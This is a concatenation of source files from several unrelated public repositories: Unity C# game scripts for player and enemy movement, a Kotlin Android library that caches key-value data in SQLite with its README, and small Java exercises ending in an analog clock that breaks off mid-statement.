spriteR = GetComponent<SpriteRenderer>();
rb = GetComponent<Rigidbody2D>();
}
private void Update()
{
}
private void FixedUpdate()
{
// CODE TO HANDLE ANIMATIONS AND FLIPPING CHARACTER
Jump();
if (direction < 0)
{
if (facingRight)
{
facingRight = false;
gameObject.GetComponent<SpriteRenderer>().flipX = true;
//gameObject.transform.localScale = new Vector3(transform.localScale.x * -1, transform.localScale.y, transform.localScale.z);
}
if (isGrounded)
anim.Play("Run");
}
else if(direction > 0)
{
if (!facingRight)
{
facingRight = true;
//gameObject.transform.localScale = new Vector3(transform.localScale.x * -1, transform.localScale.y, transform.localScale.z);
gameObject.GetComponent<SpriteRenderer>().flipX = false;
}
if (isGrounded)
anim.Play("Run");
}
        else if (isGrounded) // no horizontal input: stand still
        {
            anim.Play("Idle");
        }
//CODE TO MOVE PLAYER
if (!gameObject.GetComponent<Player>().isDead()) // Player moves only if alive
{
            direction = Input.GetAxisRaw(horizontalCtrl);
Vector3 movement = new Vector3(direction, 0f, 0f);
transform.position += movement * Time.deltaTime * movespeed;
}
}
//FUNCTION TO JUMP
void Jump()
{
if (!gameObject.GetComponent<Player>().isDead()) // Player jumps only if alive
{
if (Input.GetButtonDown(jumpButton) && isGrounded) //First Jump
{
gameObject.GetComponent<Rigidbody2D>().AddForce(new Vector2(0f, JumpPower), ForceMode2D.Impulse);
jumpsMade = 1;
}
else if (Input.GetButtonDown(jumpButton) && jumpsMade == 1) // Double Jump
{
gameObject.GetComponent<Rigidbody2D>().velocity = new Vector2(gameObject.GetComponent<Rigidbody2D>().velocity.x, 0f);
gameObject.GetComponent<Rigidbody2D>().AddForce(new Vector2(0f, JumpPower), ForceMode2D.Impulse);
jumpsMade = 0;
}
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Enemy : MonoBehaviour
{
private float speed;
private float stoppingDistance;
private float retreatDistance;
public int health;
private float timeBtwShots;
public float startTimeBtwShots;
public GameObject bullet;
public Transform player;
private SpriteRenderer spriteR;
// Start is called before the first frame update
void Start()
{
stoppingDistance = Random.Range(7, 15);
retreatDistance = Random.Range(3, 6);
speed = Random.Range(5, 15);
player = GameObject.FindGameObjectWithTag("Player").transform;
timeBtwShots = startTimeBtwShots;
spriteR = GetComponent<SpriteRenderer>();
}
// Update is called once per frame
void FixedUpdate()
{
Flip();
if(Vector2.Distance(transform.position, player.position) > stoppingDistance)
{
transform.position = Vector2.MoveTowards(transform.position, player.position, speed * Time.deltaTime);
}else if(Vector2.Distance(transform.position, player.position) < stoppingDistance && Vector2.Distance(transform.position, player.position) > retreatDistance){
            // inside stopping range but outside retreat range: hold position
}else if(Vector2.Distance(transform.position, player.position)< retreatDistance)
{
transform.position = Vector2.MoveTowards(transform.position, player.position, -speed * Time.deltaTime);
}
if (!FindObjectOfType<Player>().isDead())
{
if (timeBtwShots <= 0) // Code To Shoot
{
Instantiate(bullet, transform.position, Quaternion.identity);
timeBtwShots = startTimeBtwShots;
}
else
{
timeBtwShots -= Time.deltaTime;
}
}
}
private void Update()
{
if (health <= 0)
{
Destroy(gameObject);
}
}
public void TakeDamage(int damage)
{
health -= damage;
}
private void OnTriggerEnter2D(Collider2D collision) //Handle Obstacle Jumping
{
gameObject.GetComponent<Rigidbody2D>().velocity = new Vector2(gameObject.GetComponent<Rigidbody2D>().velocity.x, 0f);
gameObject.GetComponent<Rigidbody2D>().AddForce(new Vector2(0f, 14), ForceMode2D.Impulse);
}
private void Flip()
{
float playerX = player.position.x;
float enemyX = gameObject.transform.position.x;
if (playerX > enemyX)
{
spriteR.flipX = true;
}
else
{
spriteR.flipX = false;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class EnemyChestCollider : MonoBehaviour
{
public bool foundObject;
private void OnCollisionEnter2D(Collision2D collision)
{
foundObject = true;
}
}
| ff9b080d87c891bb645d33cbccda0c98970b72d9 | ["Markdown", "C#"] | 13 | C# | DanielVicente12/Unity-2D-Game | b2c24ffdfd4558e5cdd9c14a61a93ef7d7fb4b30 | b5e26344a6af83aee033005b08da8e57e289a31f | refs/heads/main |
<repo_name>MasterJhonny/curso-npm<file_sep>/main.js
let num1 = 34
let num2 = 45
console.log(`${num1} + ${num2} = ${num1 + num2}`);
| a54dde8e3227deed96cad6d8b5bba89ce0735dce | ["JavaScript"] | 1 | JavaScript | MasterJhonny/curso-npm | ca391637a673a0b774c778b44e0f619c18025b2c | 68ef18e713d0df8e73a36b611381417376a06ef4 | refs/heads/master |
<repo_name>wytings/DBCache<file_sep>/library/src/main/java/com/wytings/dbcache/ICacheDao.kt
package com.wytings.dbcache
import androidx.room.*
/**
* Created by Rex.Wei on 2019/6/1.
*
* @author Rex.Wei
*/
@Dao
interface ICacheDao {
@Query("SELECT * FROM t_cache_table WHERE `key` = :key LIMIT 1")
fun querySingleEntity(key: String): CacheEntity?
@Query("SELECT * FROM t_cache_table WHERE `key` IN (:keys) ORDER BY update_time DESC")
fun queryEntities(vararg keys: String): List<CacheEntity>
@Query("SELECT * FROM t_cache_table WHERE `key` LIKE :like ORDER BY update_time DESC")
fun queryAllEntities(like: String): List<CacheEntity>
@Insert(onConflict = OnConflictStrategy.REPLACE)
fun insertOrReplaceEntities(vararg entities: CacheEntity): LongArray
@Query("SELECT COUNT(*) FROM t_cache_table WHERE `key` LIKE :like")
fun queryNumberOfRows(like: String): Long
@Query("DELETE FROM t_cache_table WHERE `key` LIKE :like")
fun deleteAll(like: String)
@Delete
fun deleteEntities(vararg entities: CacheEntity): Int
}
<file_sep>/library/src/main/java/com/wytings/dbcache/DBCacheMgr.kt
package com.wytings.dbcache
import android.app.Application
import java.lang.Exception
import java.lang.reflect.Type
import java.util.*
import java.util.concurrent.ConcurrentHashMap
/**
* Created by Rex.Wei on 2019/6/1.
*
* @author Rex.Wei
*/
class DBCacheMgr private constructor(zone: String) {
private val cacheZone = "$zone$SUFFIX"
private fun cacheDao(): ICacheDao {
return AbsRoomDatabase.obtain().cacheDao()
}
private fun getRealKey(key: String): String {
return cacheZone + key
}
fun save(map: Map<String, Any>?) {
if (map.isNullOrEmpty()) {
return
}
val entities = mutableListOf<CacheEntity>()
for ((key, value) in map) {
val cacheEntity = CacheEntity(getRealKey(key))
cacheEntity.value = objectToString(value)
cacheEntity.updateTime = System.currentTimeMillis()
entities.add(cacheEntity)
}
cacheDao().insertOrReplaceEntities(*entities.toTypedArray())
}
fun getString(key: String, defaultValue: String): String {
val entity = cacheDao().querySingleEntity(getRealKey(key)) ?: return defaultValue
return entity.value
}
fun getLong(key: String, defaultValue: Long): Long {
return getDouble(key, defaultValue.toDouble()).toLong()
}
fun getDouble(key: String, defaultValue: Double): Double {
val value = getString(key, "").toDoubleOrNull()
return value ?: defaultValue
}
fun save(key: String, obj: Any) {
try {
save(mapOf(key to objectToString(obj)))
} catch (e: Exception) {
e.printStackTrace()
}
}
fun <T> getObject(key: String, typeOfT: Type): T? {
val value = getString(key, "")
return try {
jsonParser.from(value, typeOfT)
} catch (e: Exception) {
e.printStackTrace()
null
}
}
private fun objectToString(obj: Any): String {
return when (obj) {
is Number -> obj.toString()
is String -> obj
else -> jsonParser.to(obj)
}
}
fun delete(vararg keys: String) {
if (keys.isEmpty()) {
return
}
        val entities = mutableListOf<CacheEntity>()
        for (key in keys) {
            entities.add(CacheEntity(getRealKey(key)))
        }
cacheDao().deleteEntities(*entities.toTypedArray())
}
fun getCount(): Long {
return cacheDao().queryNumberOfRows("$cacheZone%")
}
fun getAll(): Map<String, String> {
val entities = cacheDao().queryAllEntities("$cacheZone%")
val map = HashMap<String, String>(entities.size)
for (entity in entities) {
map[entity.key.replaceFirst(cacheZone, "")] = entity.value
}
return map
}
fun deleteAll() {
cacheDao().deleteAll("$cacheZone%")
}
companion object {
private const val SUFFIX = "$$$"
private lateinit var jsonParser: IJSONParser
@JvmStatic
@JvmOverloads
fun initialize(application: Application, parser: IJSONParser = DefaultJsonParser()) {
AbsRoomDatabase.initialize(application)
jsonParser = parser
}
private val managerMap = ConcurrentHashMap<String, DBCacheMgr>()
@JvmStatic
fun obtain(zone: String): DBCacheMgr {
var manager = managerMap[zone]
if (manager == null) {
manager = DBCacheMgr(zone)
managerMap[zone] = manager
}
return manager
}
}
}
<file_sep>/app/src/main/java/com/wytings/demo/MainActivity.kt
package com.wytings.demo
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import com.wytings.dbcache.DBCacheMgr
import kotlinx.android.synthetic.main.activity_main.*
class MainActivity : AppCompatActivity() {
private val zone = "zone_123"
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
save.setOnClickListener {
DBCacheMgr.obtain(zone).save("key1", 123)
DBCacheMgr.obtain(zone).save("key2", 123.456)
DBCacheMgr.obtain(zone).save("key3", -123)
DBCacheMgr.obtain(zone).save("key4", "hello")
DBCacheMgr.obtain(zone).save("key5", createMap())
}
delete.setOnClickListener {
DBCacheMgr.obtain(zone).deleteAll()
}
read.setOnClickListener {
DBCacheMgr.obtain(zone).getAll().forEach {
println("${it.key} -> ${it.value}")
}
println(
"$zone total count is ${DBCacheMgr.obtain(zone).getCount()}"
)
println(
" key3 is ${DBCacheMgr.obtain(zone).getLong("key3", 10)}"
)
}
}
private fun createMap(): Map<String, Any> {
return mapOf("1" to "haha", "2" to "hoho", "3" to 100)
}
}
<file_sep>/README.md
# DBCache
cache data with SQLite on Android
### When to use DBCache
SharedPreferences and other local cache providers that are backed by a `File` rewrite the whole file every time a single value changes.
If that has become a performance problem in your app, DBCache may help: every key is its own row in SQLite, so an update only touches the rows that changed.
### Quick Tutorial
You can set up `DBCacheMgr` on app startup. In your `App` class, add these lines:
```Java
public class App extends Application {
@Override
public void onCreate() {
super.onCreate();
DBCacheMgr.initialize(this);
}
}
```
```Kotlin
val zone = "user_info" // like a cache file name

DBCacheMgr.obtain(zone).save("key1", 123)
DBCacheMgr.obtain(zone).save("key2", 123.456)
DBCacheMgr.obtain(zone).save("key3", -123)
DBCacheMgr.obtain(zone).save("key4", "hello")
DBCacheMgr.obtain(zone).save("key5", mapOf("1" to "haha", "2" to "hoho", "3" to 100))

DBCacheMgr.obtain(zone).getAll().forEach {
    println("${it.key} -> ${it.value}")
}
println("$zone total count is ${DBCacheMgr.obtain(zone).getCount()}")
println("key3 is ${DBCacheMgr.obtain(zone).getLong("key3", 10)}")

DBCacheMgr.obtain(zone).deleteAll()
```
### Download
Gradle:
```gradle
dependencies {
implementation 'com.wytings.dbcache:dbcache:1.0.0'
}
```
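
### Custom JSON parser
`DBCacheMgr.initialize` also accepts an optional second argument, an `IJSONParser` (the default implementation wraps Gson). A minimal wiring sketch — `MyJsonParser` is a hypothetical class implementing `IJSONParser`, not part of this library:
```Java
public class App extends Application {
    @Override
    public void onCreate() {
        super.onCreate();
        // MyJsonParser is illustrative: any IJSONParser implementation
        // (e.g. backed by Moshi or Jackson) can replace the Gson default.
        DBCacheMgr.initialize(this, new MyJsonParser());
    }
}
```
This only changes how `save(key, obj)` and `getObject(key, type)` serialize non-primitive objects; numbers and strings are stored as-is.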
<file_sep>/library/src/main/java/com/wytings/dbcache/CacheEntity.kt
package com.wytings.dbcache
import androidx.room.ColumnInfo
import androidx.room.Entity
import androidx.room.PrimaryKey
/**
* Created by Rex.Wei on 2019/6/1.
*
* @author Rex.Wei
*/
@Entity(tableName = "t_cache_table")
class CacheEntity(
@field:PrimaryKey
@field:ColumnInfo(name = "key")
val key: String
) {
@ColumnInfo(name = "value")
var value: String = ""
@ColumnInfo(name = "create_time")
var createTime: Long = System.currentTimeMillis()
@ColumnInfo(name = "update_time")
var updateTime: Long = 0
override fun toString(): String {
return "CacheEntity{" +
"key='" + key + '\''.toString() +
", value='" + value + '\''.toString() +
", createTime=" + createTime +
", updateTime=" + updateTime +
'}'.toString()
}
}
<file_sep>/library/src/main/java/com/wytings/dbcache/IJSONParser.kt
package com.wytings.dbcache
import java.lang.reflect.Type
/**
* Created by Rex.Wei on 2019-06-02.
*
* @author Rex.Wei
*/
interface IJSONParser {
fun <T> from(json: String, typeOfT: Type): T?
fun to(obj: Any): String
}
<file_sep>/library/src/main/java/com/wytings/dbcache/DefaultJsonParser.kt
package com.wytings.dbcache
import com.google.gson.GsonBuilder
import java.lang.reflect.Type
/**
* Created by Rex.Wei on 2019-06-02.
*
* @author Rex.Wei
*/
class DefaultJsonParser : IJSONParser {
private val helper = GsonBuilder().setLenient().setPrettyPrinting().create()
override fun <T> from(json: String, typeOfT: Type): T? {
return try {
helper.fromJson(json, typeOfT)
} catch (e: Exception) {
e.printStackTrace()
null
}
}
override fun to(obj: Any): String {
return try {
helper.toJson(obj)
} catch (e: Exception) {
e.printStackTrace()
""
}
}
}
<file_sep>/library/src/main/java/com/wytings/dbcache/AbsRoomDatabase.kt
package com.wytings.dbcache
import android.app.Application
import android.text.TextUtils
import androidx.room.Database
import androidx.room.Room
import androidx.room.RoomDatabase
import java.io.File
import java.util.concurrent.ConcurrentHashMap
/**
* Created on 2019/6/1.
*
* @author Rex.Wei
*/
@Database(entities = [CacheEntity::class], version = 1)
abstract class AbsRoomDatabase : RoomDatabase() {
abstract fun cacheDao(): ICacheDao
companion object {
private val dataBaseMap = ConcurrentHashMap<String, AbsRoomDatabase>()
private const val DB_NAME = "database_cache_room.db"
@Volatile
private var application: Application? = null
private var defaultDatabasePath = ""
get() {
if (TextUtils.isEmpty(field)) {
field = File(application!!.filesDir, DB_NAME).absolutePath
}
return field
}
@JvmStatic
fun initialize(app: Application) {
application = app
}
@JvmStatic
@Synchronized
fun obtain(absoluteDatabasePath: String = defaultDatabasePath): AbsRoomDatabase {
var manager = dataBaseMap[absoluteDatabasePath]
if (manager == null) {
manager = Room.databaseBuilder(application!!, AbsRoomDatabase::class.java, absoluteDatabasePath)
.allowMainThreadQueries()
.fallbackToDestructiveMigration()
.build()
dataBaseMap[absoluteDatabasePath] = manager
}
return manager
}
}
}
|
ffce85377b0d1bb9248a129fac17aab94d1853ce
|
[
"Markdown",
"Kotlin"
] | 8 |
Kotlin
|
wytings/DBCache
|
14c2a7e77b600aa091454dcfea8f87ac9722d3ba
|
acd401d9d550bcc5ae742577ea7ec64512d936c3
|
refs/heads/master
|
<file_sep>#!/bin/bash
# My first shell script
echo "Hello World!"
<file_sep>import os
os.system("echo Hello world!")
|
aec1cb8452646ca62121a46e2578b671e09885b0
|
[
"Python",
"Shell"
] | 2 |
Shell
|
D-Limosnero/miscellaneous
|
202096b56eddb96fefe1deae076ab103075655ef
|
08a626212cbccd9f96c8e52bf275336f256f99f8
|
refs/heads/master
|
<file_sep>package bookshelf;
//Here's some stuff to import if you're reading CSV files
/*import java.io.File;
import java.io.FileNotFoundException;
import java.util.Scanner;*/
//Here's how to write main() when using info from CSV files
/*public static void main(String[] args) throws FileNotFoundException {
System.out.println("Here's what's on your bookshelf: ");
Scanner scnr = new Scanner(new File("/Users/jeff/Desktop/books.csv"));
scnr.useDelimiter(",");
while(scnr.hasNext()) {
System.out.print(scnr.next() + "|");
}
scnr.close();
}*/
|
54cf0d08175c14ab3255eac6e47e321d3742d0ea
|
[
"Java"
] | 1 |
Java
|
jeffkillinger/java_bookshelf
|
2d2266aefb6ff91db078336130c5e88ec08b29dd
|
887331f05c64625329218386481c7299205ae75b
|
refs/heads/master
|
<repo_name>leymannx/wordpress-custom-fields<file_sep>/frontpage-fields.php
<?php
/*
Plugin Name: Front Page Custom Fields
Plugin URI: https://github.com/leymannx/wordpress-custom-fields.git
Description: This WordPress plugin adds some custom fields to a custom post type named "Front Page". Additionally it sets up a WYSIWYG editor for some of these fields. Multi-language support enabled.
Version: 1.0
Author: <NAME>
Author URI: http://berlin-coding.de
Text Domain: frontpage-fields
Domain Path: /lang
*/
/**
* Adds custom fields (meta boxes) to Front Page CPT.
*/
function admin_init() {
// add_meta_box( $id = '', $title = '', $callback = '', $screen = '', $context = '' );
add_meta_box( $id = 'quote_author_meta', $title = 'Quote Author', $callback = 'quote_author', $screen = 'frontpage_cpt', $context = 'side' );
add_meta_box( $id = 'box_left_meta', $title = 'Left Box', $callback = 'left_box', $screen = 'frontpage_cpt', $context = 'normal' );
add_meta_box( $id = 'box_right_meta', $title = 'Right Box', $callback = 'right_box', $screen = 'frontpage_cpt', $context = 'normal' );
// Meta boxes for pages.
add_meta_box( $id = 'page_sidebar-right', $title = 'Right Sidebar', $callback = 'page_right_sidebar', $screen = 'page', $context = 'normal' );
}
add_action( 'admin_init', 'admin_init' );
/**
* Meta box callback.
*/
function quote_author() {
global $post;
$custom = get_post_custom( $post->ID );
$quote_author = $custom['quote_author'][0];
?>
<textarea cols="30" rows="1" name="quote_author"><?php echo $quote_author; ?></textarea>
<?php
}
/**
* Meta box callback.
*/
function left_box() {
global $post;
$custom = get_post_custom( $post->ID );
$box_title = $custom['left_box_title'][0];
$box_content = $custom['left_box_content'][0];
?>
<p><label>Box Title</label><br/>
<textarea cols="50" rows="1" name="left_box_title"><?php echo $box_title; ?></textarea></p>
<p><label>Box Content</label><br/>
<?php wp_editor( $content = $box_content, $editor_id = 'left_box_content', $settings = array(
'textarea_name' => 'left_box_content',
'media_buttons' => FALSE,
'textarea_rows' => 20,
) ); ?>
</p>
<?php
}
/**
* Meta box callback.
*/
function right_box() {
global $post;
$custom = get_post_custom( $post->ID );
$box_title = $custom['right_box_title'][0];
$box_content = $custom['right_box_content'][0];
?>
<p><label>Box Title</label><br/>
<textarea cols="50" rows="1" name="right_box_title"><?php echo $box_title; ?></textarea></p>
<p><label>Box Content</label><br/>
<?php wp_editor( $content = $box_content, $editor_id = 'right_box_content', $settings = array(
'textarea_name' => 'right_box_content',
'media_buttons' => FALSE,
'textarea_rows' => 20,
) ); ?>
</p>
<?php
}
/**
* Meta box callback.
*/
function page_right_sidebar() {
global $post;
$custom = get_post_custom( $post->ID );
$sidebar_content = $custom['sidebar'][0];
wp_editor( $content = $sidebar_content, $editor_id = 'page_right_sidebar', $settings = array(
'textarea_name' => 'sidebar',
'media_buttons' => FALSE,
'textarea_rows' => 20,
) );
}
/**
* Ensures meta box values to get saved correctly.
*/
function save_details() {
global $post;
$fields = array( 'quote_author', 'left_box_title', 'left_box_content', 'right_box_title', 'right_box_content', 'sidebar' );
foreach ( $fields as $field ) {
// Only update fields that were actually submitted, to avoid undefined-index
// notices when posts of other types are saved.
if ( isset( $_POST[ $field ] ) ) {
update_post_meta( $post->ID, $field, $_POST[ $field ] );
}
}
}
add_action( 'save_post', 'save_details' );
<file_sep>/README.md
# wordpress-custom-fields
|
0b6ba0e050cb54ffe0ebc1cf6eaa04f2eddb070a
|
[
"Markdown",
"PHP"
] | 2 |
PHP
|
leymannx/wordpress-custom-fields
|
0cfe151517058c30ad2b2eb3380fb7d4ade31be7
|
57a3350e74caf939e0b59d118ba7be084484ac87
|
refs/heads/main
|
<file_sep>import Validator from '../app.js';
test('1', () => {
expect(Validator.validatetelephonenumber('8 (927) 000-00-00')).toEqual('+79270000000');
});
test('2', () => {
expect(Validator.validatetelephonenumber('+7 960 000 00 00')).toEqual('+79600000000');
});
test('3', () => {
expect(Validator.validatetelephonenumber('+86 000 000 0000')).toEqual('+860000000000');
});
<file_sep># ajs_7_2
[](https://ci.appveyor.com/project/Stanislavsus-edu/regex-valid-telephone)
**Legend**
You have been asked to implement cleanup of phone numbers entered in any format (for example, as on Gosuslugi) and normalization to a single format: +7xxxxxxxxxx (where each x is a digit).
You need to decide which tool to use and pick the solution that seems best to you (it may well not fit on a single line).
**Description**
Here is what we expect: your function should work as follows:
* 8 (927) 000-00-00 -> +79270000000
* +7 960 000 00 00 -> +79600000000
* +86 000 000 0000 -> +860000000000
There is no mistake in the last number: it is a Chinese number, while the first two are Russian.
Don't forget to write unit tests that provide 100% coverage of the functions and classes you test.
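The normalization task above can be sketched as follows. This is an illustrative implementation, not the repo's actual `Validator.validatetelephonenumber` from `app.js` (which is not shown here): strip every non-digit character, then rewrite a leading Russian trunk `8` to the `7` country code.

```javascript
// Hypothetical normalizer: keep digits only, then treat an 11-digit
// number starting with 8 as a Russian number (trunk prefix -> +7).
function normalizePhone(raw) {
  const digits = raw.replace(/\D/g, ''); // drop spaces, (), -, +
  const withCountry = digits.length === 11 && digits.startsWith('8')
    ? '7' + digits.slice(1) // 8 (927) ... is a Russian trunk-prefixed number
    : digits;               // +7 / +86 inputs already carry a country code
  return '+' + withCountry;
}

console.log(normalizePhone('8 (927) 000-00-00')); // +79270000000
console.log(normalizePhone('+7 960 000 00 00'));  // +79600000000
console.log(normalizePhone('+86 000 000 0000'));  // +860000000000
```

All three sample inputs from the legend map to the expected outputs, which is exactly what the unit tests in `__tests__` assert.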
|
03e5b1fd974a072887c163c46e5838a3a2c87a97
|
[
"JavaScript",
"Markdown"
] | 2 |
JavaScript
|
Stanislavsus-edu/regex_valid-telephone
|
480bd83189c2ea5fdca0a5c3e1d3000f3c47af39
|
8b6ccc9de418909bf3f79618f54f047c4d9539fe
|
refs/heads/master
|
<repo_name>anuragb26/f1-stats<file_sep>/src/hoc/Layout/Layout.js
import React, { Fragment } from 'react'
import { Container } from 'reactstrap'
import Header from '../../components/Header/Header'
import Footer from '../../components/Footer/Footer'
const layout = ({ children }) => (
<Fragment>
<Container fluid>
<Header />
<section className="app">{children}</section>
<Footer />
</Container>
</Fragment>
)
export default layout
<file_sep>/src/components/Table/Table.js
import React from 'react'
import BootstrapTable from 'react-bootstrap-table-next'
import paginationFactory from 'react-bootstrap-table2-paginator'
import 'react-bootstrap-table-next/dist/react-bootstrap-table2.min.css'
import './Table.scss'
const table = ({
data,
columns,
paginationOptions,
rowClasses,
defaultSorted,
filter
}) => {
const tableProps = {
keyField: 'id',
data,
columns,
bootstrap4: true,
classes: 'mt-3',
headerClasses: 'table__header',
rowClasses,
bordered: false,
pagination: paginationFactory(paginationOptions),
filter,
defaultSorted
}
return <BootstrapTable {...tableProps} />
}
export default table
<file_sep>/README.md
## FinCompare Front-end challenge
This project contains the UI codebase for the FinCompare Front-end Challenge
(https://github.com/fincompare/frontend-challenge)
## Public url
https://f1-stats.netlify.com/
## Flow
1) On page mount, show a list of the F1 world champions with relevant information from 2005 until 2015<br/>
2) Click on any element to open collapsible content listing the winners of all races for that year in tabular format<br/>
3) The row where the race winner is the same as the world champion of that year is highlighted.<br/>
4) Also added filter functionality for driver name and constructor name.<br/>
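The highlight rule in step 3 can be sketched as a simple comparison. The object shapes below are illustrative assumptions, not the Ergast API's actual response fields:

```javascript
// A race row gets a highlight class when its winner is also the
// season's world champion; all other rows get no extra class.
const champion = { driverId: 'alonso' };
const races = [
  { raceName: 'Bahrain Grand Prix', winnerId: 'alonso' },
  { raceName: 'Monaco Grand Prix', winnerId: 'raikkonen' },
];

const rowClasses = races.map(race =>
  race.winnerId === champion.driverId ? 'row--highlighted' : ''
);

console.log(rowClasses); // ['row--highlighted', '']
```

In the app itself this kind of per-row class is what the `rowClasses` prop of `react-bootstrap-table-next` is for.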
## Getting Started
Local Setup:
1. npm install
2. npm start
This will start the server at http://localhost:3000/
## Prerequisites
1)npm
2)node
## Tech Stack
Reactjs (scaffolding -> create-react-app), React Router v4
Styling -> SCSS, Bootstrap 4 (Reactstrap library based on Bootstrap 4 -> https://reactstrap.github.io/)
## Folder Structure.
src/containers -> React components mapped to the routes; can later be used with a Redux store.
src/components -> React Components
src/assets -> Images,svgs and fonts(whichever necessary)
src/hoc -> Higher Order Components
src/constants -> Config Variables.
src/styles -> SASS based Styles over-riding bootstrap variables wherever necessary
src/utils -> Helper functions.
## Code formatter
prettier -> (https://prettier.io/)
Configured a pre-commit hook in package.json which will automatically format the changed files as per the
config set in .prettierrc
## Commit Messages
https://seesparkbox.com/foundry/semantic_commit_messages
## Author
- **<NAME>** (<EMAIL>)
<file_sep>/src/containers/Home/Home.js
import React, { Component, Fragment } from 'react'
import { Row, Col } from 'reactstrap'
import axios from 'axios'
import Jumbotron from '../../components/Jumbotron/Jumbotron'
import Loader from '../../components/Loader/Loader'
import WinnerInfo from '../../components/WinnerInfo/WinnerInfo'
import {
getWinnersListApiEndpoint,
getRaceWinnersApiEndpoint
} from '../../constants'
import f1 from '../../assets/img/f1.png'
import queryStringUtils from '../../utils/queryStringUtils'
import './Home.scss'
class Home extends Component {
state = {
loading: true,
winnerInfo: {},
raceTable: {},
error: false
}
componentDidMount() {
this.setState(
{
loading: true
},
() => {
axios
.get(
getWinnersListApiEndpoint(
queryStringUtils.createQueryString({
limit: 11,
offset: 55
})
)
)
.then(res => {
this.setState({
loading: false,
winnerInfo: this.getWinnerInfo(res.data)
})
})
}
)
}
getWinnerInfo = data => {
const {
MRData: {
StandingsTable: { StandingsLists: winnerList }
}
} = data
const winnerInfo = winnerList.reduce((prevObj, currentWinner) => {
prevObj[currentWinner.season] = currentWinner.DriverStandings[0]
return prevObj
}, {})
return winnerInfo
}
updateRaceTable = year => {
axios.get(getRaceWinnersApiEndpoint(year)).then(res => {
const { data } = res
this.setState((prevState, props) => ({
raceTable: {
...prevState.raceTable,
[year]: data.MRData.RaceTable.Races
}
}))
})
}
render() {
const {
state: { loading, winnerInfo, raceTable }
} = this
return (
<Fragment>
<Row className="jumbotron-wrapper">
<Col sm="12">
<Jumbotron>
<div className="content-wrapper">
<img src={f1} width={100} alt="logo" />
<p className="lead">F1 world champions from 2005 until 2015</p>
</div>
</Jumbotron>
</Col>
</Row>
<Row className="winner-list-wrapper">
{loading ? (
<Loader />
) : (
<Fragment>
{Object.keys(winnerInfo).map(year => {
const raceTableForYear = raceTable[year] || []
return (
<Col key={year} sm="12">
<div className="px-4 py-4 my-2 info-wrapper">
<WinnerInfo
year={year}
winnerInfo={winnerInfo[year]}
raceTable={raceTableForYear}
updateRaceTable={this.updateRaceTable}
/>
</div>
</Col>
)
})}
</Fragment>
)}
</Row>
</Fragment>
)
}
}
export default Home
<file_sep>/src/components/DriverInfo/DriverInfo.js
import React from 'react'
import './DriverInfo.scss'
const driverInfo = ({ year, driver, name, info, raceInfo, constructor }) => (
<div className="driver-info d-flex">
<div className="winning-year">{year}</div>
<div className="d-flex flex-column justify-content-center">
<div className="personal-info px-3 py-2">
<a target="_blank" rel="noopener noreferrer" href={`${driver.url}`}>
{' '}
<strong>{name}</strong>
</a>
<span>{info}</span>
</div>
<p className="race-info px-3 py-2 lead">
{raceInfo}{' '}
<a
target="_blank"
rel="noopener noreferrer"
href={`${constructor[0].url}`}
>
{`${constructor[0].name}`}
</a>
</p>
</div>
</div>
)
export default driverInfo
|
27bea5b578d79181b5129794c15d568d2f76c8b3
|
[
"JavaScript",
"Markdown"
] | 5 |
JavaScript
|
anuragb26/f1-stats
|
777b876ef5595f21271665c47a67965fae2715b1
|
04523df4957f0b4e3a57c32d575e001dd77905ae
|
refs/heads/master
|
<file_sep>
public class ABAB123 {
public static void main(String[] args) {
String a = "12123456";
String b = a.replaceAll("1", "我").replaceAll("2", "你");
System.out.println(b);
}
}
<file_sep>
public class CCC {
public static void main(String[] args) {
String a = "12345678";
char b = '0';
for (int i=0; i<a.length(); i++){
//System.out.println(b);
b = a.charAt(i);
System.out.println(b);
}
//System.out.println(b);
switch(b){
case '1': // must compare against the character '1'; the int literal 1 never matches a digit char
System.out.println("一");
break;
}
}
}
<file_sep>import java.awt.Color;
import java.awt.Graphics;
import java.awt.Graphics2D;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.util.Calendar;
import java.util.GregorianCalendar;
import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.Timer;
public class FirstClock extends JFrame{
public FirstClock() {
super("類比時鐘");
PaintClock paintclock = new PaintClock();
add(paintclock);
Timer timers = new Timer(1000, new ActionListener() {
@Override
public void actionPerformed(ActionEvent ae) {
paintclock.timer();
}
});
timers.start();
setSize(400, 400);
setResizable(false);// disable window resizing
setVisible(true);
setDefaultCloseOperation(EXIT_ON_CLOSE);
}
class PaintClock extends JPanel{
Calendar time = new GregorianCalendar();// create a Calendar instance for reading the current time
String[] number = {"12","1","2","3","4","5","6","7","8","9","10","11"};
int secend,minute,hour;
int ceneterX = 200,ceneterY = 200;
PaintClock(){
setBackground(Color.LIGHT_GRAY);
}
public void timer() {
// setTimeInMillis sets the calendar's current time from the given long value;
// System.currentTimeMillis() returns the current time in milliseconds.
time.setTimeInMillis(System.currentTimeMillis());
// Redraw the clock.
repaint();
}
@Override
protected void paintComponent(Graphics g) {
super.paintComponent(g);
Graphics2D g2 = (Graphics2D)g;
secend = time.get(Calendar.SECOND);// read the time fields via Calendar getters
minute = time.get(Calendar.MINUTE);
hour = time.get(Calendar.HOUR);
g2.setColor(Color.WHITE);
g2.drawLine(ceneterX, ceneterY, (int)(ceneterX+100*Math.sin(secend*Math.PI/30)),
(int)(ceneterY-100*Math.cos(secend*Math.PI/30)));
g2.setColor(Color.YELLOW);
g2.drawLine(ceneterX, ceneterY, (int) (ceneterX + 80 * Math.sin(minute * Math.PI / 30)),
(int) (ceneterY - 80 * Math.cos(minute * Math.PI / 30)));
g2.setColor(Color.RED);
g2.drawLine(ceneterX, ceneterY, (int) (ceneterX + 60 * Math.sin((hour + minute / 60.0) * Math.PI / 6)),
(int) (ceneterY - 60 * Math.cos((hour + minute / 60.0) * Math.PI / 6)));
paintnumber(g);
}
public void paintnumber(Graphics g2){
for(int i=0;i<12;i++){
g2.setColor(Color.BLACK);
g2.drawString(number[i],(int)(ceneterX+135*Math.sin(i*Math.PI/6))-5,
(int)(ceneterY-135*Math.cos(i*Math.PI/6))+5);
}
g2.setColor(Color.BLUE);
for (int i = 0; i < 60; i++) {
g2.drawLine((int) (ceneterX - 110 * Math.cos(i * Math.PI / 30)), (int) (ceneterY + 110 * Math.sin(i * Math.PI / 30)),
